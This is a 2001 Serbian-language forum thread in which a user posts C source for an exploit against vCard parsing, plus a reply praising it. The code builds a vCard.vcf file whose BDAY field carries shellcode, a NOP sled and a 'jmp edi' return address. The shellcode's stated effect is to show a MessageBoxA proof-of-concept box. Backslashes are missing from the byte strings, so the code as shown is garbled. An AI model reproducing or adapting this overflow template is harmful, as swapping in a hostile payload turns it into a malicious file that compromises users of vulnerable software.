[ kajla @ 29.07.2001. 23:54 ] @
Posto je bilo pitanja u vezi sa ovim exploit-om odlucio sam da ga postujem(nadam se da su komentari pregledni):

Code:

#include <stdio.h>

main()
{
    FILE *f;
    char eip[]="xc5x95x79x76"; /* jmp edi */
    char shell_code[]=
        "x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65"
        "x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B"
        "x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10";

    /*  Ovaj shell_code sto sam napisao radi sledece:
        poziva MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0)

        xor esi,esi
        push 0xBFF5412e    ;adresa MessageBoxA() u user32.dll
        push esi
        mov dword ptr[edx],72614376h
        mov dword ptr[edx+04h],78652064h
        mov dword ptr[edx+08h],696f6c70h
        mov dword ptr[edx+0Ch],79622074h
        mov dword ptr[edx+010h],6a616b20h
        mov dword ptr[edx+014h],esi
        mov word ptr[edx+014h],616ch
        push edx
        push edx
        push esi
        call dword ptr[esp+010h]                        */

    char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90";         /* 14 NOPS */
    char body_text[]=
        "BEGIN:VCARDn"
        "VERSION:2.1n"
        "N:;kajlan"
        "FN:kajlan"
        "BDAY:";
    char end_text[]=
        "EMAIL;PREF;INTERNET:[email protected]"
        "REV:20010728T152652Zn"
        "END:VCARDn";

    clrscr();
    if ((f=fopen("vCard.vcf","w"))==NULL)
    {
        fprintf(stderr,"Cannot create file vCard.vcfn");
        exit(1);
    }
    fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text);
    fclose(f);
    printf("File: vCard.vcf created!");
    getch();

    return 0;
}
[ slash @ 30.07.2001. 11:07 ] @
nemam bas nesto iskustva sa win32 overflowima pa mi je jako zao sto se nisam mogao ukljuciti u diskusiju, iako je predator to nadoknadio :) Nice exploit btw :)

keep up the good work !